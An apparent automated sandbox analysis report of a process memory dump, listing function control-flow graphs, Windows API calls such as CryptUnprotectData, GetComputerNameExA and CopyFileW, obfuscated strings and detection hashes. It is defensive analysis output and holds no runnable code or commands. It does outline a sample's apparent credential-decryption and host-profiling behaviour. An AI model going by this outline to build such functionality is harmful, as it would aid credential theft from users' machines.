529->533 534 42d75d-42d760 529->534 532 42d7f0-42d7f6 530->532 535 42d8db-42d8de call 4319e0 531->535 536 42d8c9-42d8cf 531->536 542 42d7f8-42d7fe 532->542 539 42d791-42d794 533->539 540 42d80a-42d812 533->540 534->533 537 42d762-42d774 534->537 545 42d8e3-42d90f 535->545 538 42d8d0-42d8d9 536->538 543 42d777-42d77a 537->543 538->535 538->538 539->540 544 42d796-42d7e2 539->544 547 42d814-42d817 540->547 548 42d819-42d81c 540->548 542->526 546 42d800-42d802 542->546 543->532 544->532 546->528 549 42d808 546->549 547->542 550 42d81e-42d848 548->550 551 42d84d-42d84f 548->551 549->526 550->543 551->543
                          APIs
                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D423
                          • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042D4EF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ComputerName
                          • String ID:
                          • API String ID: 3545744682-0
                          • Opcode ID: b19bbbee5f47dadc0b832df9eaf1bee1b64d03f900b39eb79acd8ed5907b8eef
                          • Instruction ID: 89e4f82b84a28f81d5a6469b3470d4e63a59147a0d84765ae0e0f3c6f7d63153
                          • Opcode Fuzzy Hash: b19bbbee5f47dadc0b832df9eaf1bee1b64d03f900b39eb79acd8ed5907b8eef
                          • Instruction Fuzzy Hash: 0EE1C720608B918EE725CB39D4507B3BBE19F67304F58889EC4EA8B387D779A409C765
                          Function 004277C0 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 624 4277c0-4277e3 625 4277f0-42781b 624->625 625->625 626 42781d-427829 625->626 627 427874-42787f 626->627 628 42782b-427833 626->628 630 427880-4278eb 627->630 629 427840-427847 628->629 631 427850-427856 629->631 632 427849-42784c 629->632 630->630 633 4278ed-4278f1 630->633 631->627 637 427858-42786c call 43e420 631->637 632->629 636 42784e 632->636 634 427980-427982 633->634 635 4278f7-42791f call 43bb20 633->635 639 427c7e-427c87 634->639 643 427920-42794b 635->643 636->627 642 427871 637->642 642->627 643->643 644 42794d-427959 643->644 645 4279a6-4279aa 644->645 646 42795b-427963 644->646 648 4279b0-4279b9 645->648 649 427c75-427c7b call 43bb70 645->649 647 427970-427977 646->647 652 427987-42798d 647->652 653 427979-42797c 647->653 650 4279c0-4279d5 648->650 649->639 650->650 654 4279d7-4279d9 650->654 652->645 657 42798f-42799e call 43e420 652->657 653->647 656 42797e 653->656 658 4279e0-4279ee call 408440 654->658 659 4279db 654->659 656->645 662 4279a3 657->662 664 427a00-427a0a 658->664 659->658 662->645 665 4279f0-4279fe 664->665 666 427a0c-427a0f 664->666 665->664 667 427a23-427a2a 665->667 668 427a10-427a1f 666->668 670 427a30-427a3b 667->670 671 427c6c-427c72 call 408450 667->671 668->668 669 427a21 668->669 669->665 673 427a8b-427aa4 call 408440 670->673 674 427a3d-427a47 670->674 671->649 683 427aaa-427ab0 673->683 684 427bfe-427c2f 673->684 677 427a5c-427a60 674->677 678 427a62-427a6b 677->678 679 427a50 677->679 681 427a80-427a84 678->681 682 427a6d-427a70 678->682 685 427a51-427a5a 679->685 681->685 686 427a86-427a89 681->686 682->685 683->684 687 427ab6-427abf 683->687 688 427c30-427c44 684->688 685->673 685->677 686->685 689 427ac0-427aca 687->689 688->688 690 427c46-427c69 call 409130 call 408450 688->690 691 427ae0-427ae5 689->691 692 427acc-427ad1 689->692 690->671 695 427b10-427b22 691->695 696 427ae7-427aea 691->696 694 427b90-427b96 692->694 701 427b98-427b9e 694->701 698 427baa-427bb3 695->698 699 427b28-427b2b 695->699 696->695 702 427aec-427b00 696->702 706 427bb5-427bbb 698->706 707 427bbd-427bc0 698->707 699->698 703 427b2d-427b8f 699->703 701->684 705 427ba0-427ba2 701->705 702->694 703->694 705->689 708 427ba8 705->708 706->701 709 427bc2-427bf4 707->709 710 427bf6-427bfc 707->710 708->684 709->694 710->694
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ;:=<
                          • API String ID: 2994545307-1779823811
                          • Opcode ID: 1334f79235220ba33ac831f84196b83910ab924fbf5405a7c2f169c4aab764d1
                          • Instruction ID: b9df0df8ec96dde64e0b3a4675888c70f5e30a26a888c7ed3d759d3b3fdc126a
                          • Opcode Fuzzy Hash: 1334f79235220ba33ac831f84196b83910ab924fbf5405a7c2f169c4aab764d1
                          • Instruction Fuzzy Hash: CAC16A72B0C3208BD714CB29D84163BB7D2EBD5314F59857ED88A8B385D679ED02C78A
                          Function 004192C3 Relevance: 1.7, APIs: 1, Instructions: 156encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419491
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CryptDataUnprotect
                          • String ID:
                          • API String ID: 834300711-0
                          • Opcode ID: 67066d79f2e0e2c556ddced3fbca7fcfc7bbba99d09ee7c06a8ed8b3fd2b2a06
                          • Instruction ID: 2f515dfc4c4df483a9c515854f49534d3ffdd9ab5ad4ae8a739720e01657628b
                          • Opcode Fuzzy Hash: 67066d79f2e0e2c556ddced3fbca7fcfc7bbba99d09ee7c06a8ed8b3fd2b2a06
                          • Instruction Fuzzy Hash: E65108B15083558FC724CF69C4D12ABBBE1AF99304F08496EE4E987382D239DD45CB56
                          Function 00438ED0 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-3019521637
                          • Opcode ID: 1337c2d53c43d85541e2160734128aa11c282de89a300e4156288c8f50bcbfb4
                          • Instruction ID: 10dcefb1d69153240ead42e29cb6c44a97267fa514bdd6c96bec7f4ae6184812
                          • Opcode Fuzzy Hash: 1337c2d53c43d85541e2160734128aa11c282de89a300e4156288c8f50bcbfb4
                          • Instruction Fuzzy Hash: A7917937B043114BE7189E68CC8267BB7E3EBC9304F1D953DD99593391EAB89C058789
                          Function 00441CB0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: FGFA
                          • API String ID: 2994545307-1293343293
                          • Opcode ID: 338c331d98de2080d3cc373bd636463768723e52d7fccd1f0fed820e67ba5b8b
                          • Instruction ID: d82890ae5b8405dd5d772d792f4ed481fd850e875cd217ff149d6bf94a1c741a
                          • Opcode Fuzzy Hash: 338c331d98de2080d3cc373bd636463768723e52d7fccd1f0fed820e67ba5b8b
                          • Instruction Fuzzy Hash: 0E7138716083009BE728CF24D891A7BB7E2EBD5344F18893DE996473A1DB38D885C749
                          Function 0043E420 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LdrInitializeThunk.NTDLL(00440F42,005C003F,00000008,00000018,?), ref: 0043E44E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                          Function 00441050 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: 5|iL
                          • API String ID: 2994545307-1880071150
                          • Opcode ID: 1578b8eaa752ad71c318a274595036bf3ea4456157c48e53902889dd4741d643
                          • Instruction ID: 6dd94c4376c72eaa9512bdfb30cf4860a9d07aabf8ea00ee791b3781dee47efc
                          • Opcode Fuzzy Hash: 1578b8eaa752ad71c318a274595036bf3ea4456157c48e53902889dd4741d643
                          • Instruction Fuzzy Hash: 68412975715301AFF7148F25EC81B37B7E6EB85344F28452EE280873A5E678E890875D
                          Function 00441480 Relevance: .3, Instructions: 251COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9ab38bd6cec5db73bcef0a96c5f6ebba2909499636b8e1f76d9be44b8248d6f1
                          • Instruction ID: 815013dd8d55479357c847a7de1601a9ecbb677cc3027380411dfb722df17a6b
                          • Opcode Fuzzy Hash: 9ab38bd6cec5db73bcef0a96c5f6ebba2909499636b8e1f76d9be44b8248d6f1
                          • Instruction Fuzzy Hash: 69613632B04301ABD728CF18DC81B6BB7E2EFD5350F19852EE5858B365EB38D850874A
                          Function 00409E21 Relevance: .2, Instructions: 188COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6b5e08f9041a5aefe18e589cb7c56b4c5957cab1d47971e66b085f206ab3dbc
                          • Instruction ID: e107110464568c6d81bcb4f09fecce986dab2e9b73150605e9f7cbbdcbce5b28
                          • Opcode Fuzzy Hash: e6b5e08f9041a5aefe18e589cb7c56b4c5957cab1d47971e66b085f206ab3dbc
                          • Instruction Fuzzy Hash: 6B511772A513644BDB54CF68CD897DE7B32AB96300F1842E9C9847B246CB780E45CB84
                          Function 00420EF0 Relevance: .2, Instructions: 171COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bfc3a67e5b2ad3164977090e58aba5a105025c03ffe3068a1343ced494e92333
                          • Instruction ID: 1fa01920aa2e6fcc8fe30a53230af68cef853f403f28198226460abcb875f5b2
                          • Opcode Fuzzy Hash: bfc3a67e5b2ad3164977090e58aba5a105025c03ffe3068a1343ced494e92333
                          • Instruction Fuzzy Hash: F6413679A08310EFE310DF25EC8161F77E4EB8A318F55843EFA8583282DB7599098797
                          Function 0042D30B Relevance: 4.9, APIs: 3, Instructions: 397COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 405 42d30b-42d36a call 4402f0 409 42d370-42d395 405->409 409->409 410 42d397-42d3a3 409->410 411 42d3a5-42d3ab 410->411 412 42d3bb-42d3c7 410->412 413 42d3b0-42d3b9 411->413 414 42d3db-42d454 FreeLibrary call 4402f0 GetComputerNameExA 412->414 415 42d3c9-42d3cf 412->415 413->412 413->413 420 42d460-42d479 414->420 416 42d3d0-42d3d9 415->416 416->414 416->416 420->420 421 42d47b-42d484 420->421 422 42d486-42d48f 421->422 423 42d49d 421->423 424 42d490-42d499 422->424 425 42d4a0-42d4ac 423->425 424->424 428 42d49b 424->428 426 42d4cb-42d52b GetComputerNameExA 425->426 427 42d4ae-42d4b4 425->427 430 42d530-42d54a 426->430 429 42d4c0-42d4c9 427->429 428->425 429->426 429->429 430->430 431 42d54c-42d555 430->431 432 42d557-42d55f 431->432 433 42d56b-42d577 431->433 434 42d560-42d569 432->434 435 42d58b-42d5e5 433->435 436 42d579-42d57f 433->436 434->433 434->434 439 42d5f0-42d614 435->439 437 42d580-42d589 436->437 437->435 437->437 439->439 440 42d616-42d61f 439->440 441 42d621-42d627 440->441 442 42d63b-42d647 440->442 443 42d630-42d639 441->443 444 42d65b-42d6af call 4402f0 442->444 445 42d649-42d64f 442->445 443->442 443->443 450 42d6b0-42d6da 444->450 446 42d650-42d659 445->446 446->444 446->446 450->450 451 42d6dc-42d6e5 450->451 452 42d6e7-42d6ef 451->452 453 42d6fb-42d710 451->453 454 42d6f0-42d6f9 452->454 455 42d716-42d71f 453->455 456 42d854-42d89a 453->456 454->453 454->454 458 42d720-42d732 455->458 457 42d8a0-42d8ba 456->457 457->457 461 42d8bc-42d8c7 457->461 459 42d750-42d75b 458->459 460 42d734-42d741 458->460 463 42d780-42d78f 459->463 464 42d75d-42d760 459->464 462 42d7f0-42d7f6 460->462 465 42d8db-42d8de call 4319e0 461->465 466 42d8c9-42d8cf 461->466 472 42d7f8-42d7fe 462->472 469 42d791-42d794 463->469 470 42d80a-42d812 463->470 464->463 467 42d762-42d774 464->467 475 42d8e3-42d90f 465->475 468 42d8d0-42d8d9 466->468 473 42d777-42d77a 467->473 468->465 468->468 469->470 474 42d796-42d7e2 469->474 477 42d814-42d817 470->477 478 42d819-42d81c 470->478 472->456 476 42d800-42d802 472->476 473->462 474->462 476->458 479 42d808 476->479 477->472 480 42d81e-42d848 478->480 481 42d84d-42d84f 478->481 479->456 480->473 481->473
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 0042D3E7
                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D423
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ComputerFreeLibraryName
                          • String ID:
                          • API String ID: 2904949787-0
                          • Opcode ID: 91702c7460f3ea3bf4d01a5b60907db3589e9077fd064fd8907a4202272a672a
                          • Instruction ID: c668425f42623d5c4cbfc84636ffe6d391bf7abc2db824b82279399dc59abe95
                          • Opcode Fuzzy Hash: 91702c7460f3ea3bf4d01a5b60907db3589e9077fd064fd8907a4202272a672a
                          • Instruction Fuzzy Hash: C5D1B460608B918EE7258F35D460BB3BBE19F27304F58489EC5EB87293D7796409CB26
                          Function 0043E370 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,00000001,?,00000000,?,?,0040BA1A,00000000,00000001,?,00000000,?,00000000), ref: 0043E3DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a7ff0f798fc30b76f792086ad38cbd0beafc262cb4d4de1013c7cd7c48cde5aa
                          • Instruction ID: 8a7d37f52372a3ed27f7298983152f214c485853710a149744c9cc568332bd43
                          • Opcode Fuzzy Hash: a7ff0f798fc30b76f792086ad38cbd0beafc262cb4d4de1013c7cd7c48cde5aa
                          • Instruction Fuzzy Hash: CD0168796083419BD3009B26FC51B6BBB9EEFDB315F184039E94583741CA3AAC16C396
                          Function 0043BB70 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043BBD8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 8d9fd6ef3cdb193d8b3789759a94b763c2d9e2e0f2e5a70ab70441a6e758872c
                          • Instruction ID: e5c94070d7be715cae25744535c21d30189543ffbabb06430699a339effd1bca
                          • Opcode Fuzzy Hash: 8d9fd6ef3cdb193d8b3789759a94b763c2d9e2e0f2e5a70ab70441a6e758872c
                          • Instruction Fuzzy Hash: 1FF059B8B091108FD304DB14FC10A3BBBD5EBDA324F1A803CE0858A796D6308C01CB86
                          Function 0043BB20 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043BB60
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 6222587eb63aec0e9e6e5b0661e6e2458e94e8f3d2309b5164a83277eee18734
                          • Instruction ID: f31c5af4229bae75d383888768342b37ffc4cc1a62a4ebab35f5a50810103b6c
                          • Opcode Fuzzy Hash: 6222587eb63aec0e9e6e5b0661e6e2458e94e8f3d2309b5164a83277eee18734
                          • Instruction Fuzzy Hash: 60E0D83050C3404FD7066B24E8A6B2ABFA2EB96B14F60456CE4C1473E2CA365C2BCB57
                          Function 004332F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 2a12333dd22575aa26cb5ced0141f8cbb95bbe0f2fef6aef6fd922132291aa15
                          • Instruction ID: f4578040463029fd206be13c71bfcd013365946abaacd1db1e9905d356089b32
                          • Opcode Fuzzy Hash: 2a12333dd22575aa26cb5ced0141f8cbb95bbe0f2fef6aef6fd922132291aa15
                          • Instruction Fuzzy Hash: 6AF01D74A483418FE314DF24C49875ABBE1EBC4304F10895DE5948B790CBB59648CF86
                          Function 00430969 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 827844dc8d69ddff0662615ca8cc6eb72eb5c84a5e5e6005d271f688d27f7df8
                          • Instruction ID: 4291cfd54b30b210e79bceb8c8d378b9125f638b093c55bebcd8583c723f5694
                          • Opcode Fuzzy Hash: 827844dc8d69ddff0662615ca8cc6eb72eb5c84a5e5e6005d271f688d27f7df8
                          • Instruction Fuzzy Hash: 15F0B7B41097018FE304DF28C5A871ABBF0FB89308F10481CE1968B3A0DB75AA48CF82
                          Function 0040CD40 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: f1eefa1e2715ee8e2ff37698e3af7a915f3b6bd3fa32b9f9d666b28f3977ec7e
                          • Instruction ID: 07c29162f38ee33b17f71475a022d17df7fc23ef7cfd2a8f3c81aa62a753a06a
                          • Opcode Fuzzy Hash: f1eefa1e2715ee8e2ff37698e3af7a915f3b6bd3fa32b9f9d666b28f3977ec7e
                          • Instruction Fuzzy Hash: E5E0C236B9114417E314BB18DC0BF46362A83C3731F08C236A255C67C4DC28D805C2A6
                          Function 0040CD7E Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CD90
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeSecurity
                          • String ID:
                          • API String ID: 640775948-0
                          • Opcode ID: eff080751637ce3825c0043289b774b8fcb52c3ad225c83be113463185c7acaa
                          • Instruction ID: 3f0139b8e32ca54a791a6843e812a05b786a47bc7fe22565ae8806df4a9aca9a
                          • Opcode Fuzzy Hash: eff080751637ce3825c0043289b774b8fcb52c3ad225c83be113463185c7acaa
                          • Instruction Fuzzy Hash: BED092347C4341B6EA68DB08AC53F1432115303F52F314628B362EE2E5C9E061118A1D

                          Non-executed Functions

                          Function 00425440 Relevance: 37.1, Strings: 29, Instructions: 805COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$3c?a$3w+u$5u w$:<$<o0m$?s,q$@=g?$BUB$RUB$Sg/e$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-3750274029
                          • Opcode ID: 92e364e5da0e89b5e2c9cf0d797657a3b5a3af905b9ea4ad65fcc6e156b3464b
                          • Instruction ID: 5ac324ea4a72efb1c0e64a034cd5d4e5955bd14a257644c688f756931cb9cd25
                          • Opcode Fuzzy Hash: 92e364e5da0e89b5e2c9cf0d797657a3b5a3af905b9ea4ad65fcc6e156b3464b
                          • Instruction Fuzzy Hash: 12825FB55093819BE334CF11E881BEBBBE1FB86344F408A2DD6D99B241DB748446CF96
                          Function 004251D0 Relevance: 30.9, Strings: 24, Instructions: 910COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$5u w$:<$@=g?$BUB$RUB$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-2601126255
                          • Opcode ID: 30d1a1606326d07f2d8d30286cde889be6ce881e1d8216ed3a02a6de3c766cf9
                          • Instruction ID: 1f9792d30e5dc87b445a3f9c6be40305c731601921a44a64e60cab06b5220c61
                          • Opcode Fuzzy Hash: 30d1a1606326d07f2d8d30286cde889be6ce881e1d8216ed3a02a6de3c766cf9
                          • Instruction Fuzzy Hash: 4E9260B56093819FE334CF11E880BABBBE1FB86344F41892DD6C99B251DB748446CF96
                          Function 004255D0 Relevance: 30.8, Strings: 24, Instructions: 769COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$5u w$:<$@=g?$BUB$RUB$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-2601126255
                          • Opcode ID: 2a662cd9e502a88f408f5537358a265835d9a6d63c3f09aaf0a14ef6dd8db4e6
                          • Instruction ID: 3f1884a41b76af52d70204986f6b11e9b34086b7b54899efdde232d0b1a8db8d
                          • Opcode Fuzzy Hash: 2a662cd9e502a88f408f5537358a265835d9a6d63c3f09aaf0a14ef6dd8db4e6
                          • Instruction Fuzzy Hash: C6724EB56093819BE334CF15E880BEBBBE0BB86344F40892DD6D99B241DB748446CF96
                          Function 0041FF90 Relevance: 18.4, Strings: 14, Instructions: 923COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: _fV$'$ "$.kG$0 ..$7d[Y$QSeh$WnK{$[ptv$kRo_$o$f$pDyy$rsC@$uwyT$}$(`
                          • API String ID: 0-1340030871
                          • Opcode ID: 6ba73bf0097c3be3ee3b6578bb71018bb33be576f157c5576b6f39946b6d443b
                          • Instruction ID: 5fffecbda7cbc7b460104305e8243ccb5fb6ca6385620283a739c42bfb3ed6fe
                          • Opcode Fuzzy Hash: 6ba73bf0097c3be3ee3b6578bb71018bb33be576f157c5576b6f39946b6d443b
                          • Instruction Fuzzy Hash: 04621170604B918FC735CF29D490627BBE1BF95304B588A6EC4E68BB93D738E846CB54
                          Function 004288DD Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 366fileCOMMON
                          Download Yara Rule
                          APIs
                          • CopyFileW.KERNEL32(00000000,?,00000000,?,?,?,?,yhKH 0M::,g@mYU-1X(&), ref: 00428978
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID: 0M:$1X(&$:,g@$;:=<$=(05$=(05yhKH 0M::,g@mYU-1X(&$L#L-$mYU-$yhKH
                          • API String ID: 1304948518-1839588596
                          • Opcode ID: 7e13ca6f808b2bc6bd2b8665dea8e0fc6a964b54b4b8c885267d63d5a6a599b7
                          • Instruction ID: 29340e41837ad6d3de6b008828bb1df49b62f07a875fabe1b4272e794f794163
                          • Opcode Fuzzy Hash: 7e13ca6f808b2bc6bd2b8665dea8e0fc6a964b54b4b8c885267d63d5a6a599b7
                          • Instruction Fuzzy Hash: E0D1F0B9E00616CFDB14CF68D88166EB7B1FF89304F58816ED405AB351EB34A952CBD8
                          Function 004288F8 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 295fileCOMMON
                          Download Yara Rule
                          APIs
                          • CopyFileW.KERNEL32(00000000,?,00000000,?,?,?,?,yhKH 0M::,g@mYU-1X(&), ref: 00428978
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID: 0M:$1X(&$:,g@$;:=<$=(05$=(05yhKH 0M::,g@mYU-1X(&$L#L-$mYU-$yhKH
                          • API String ID: 1304948518-1839588596
                          • Opcode ID: 8395b2ff723097783f37449b486a51335824c06b05f9ef334af531377daae234
                          • Instruction ID: 180dd6a639ffca2a901490a16017f2abe53e3b3af0fb2eee3fc12670b9eb8d5c
                          • Opcode Fuzzy Hash: 8395b2ff723097783f37449b486a51335824c06b05f9ef334af531377daae234
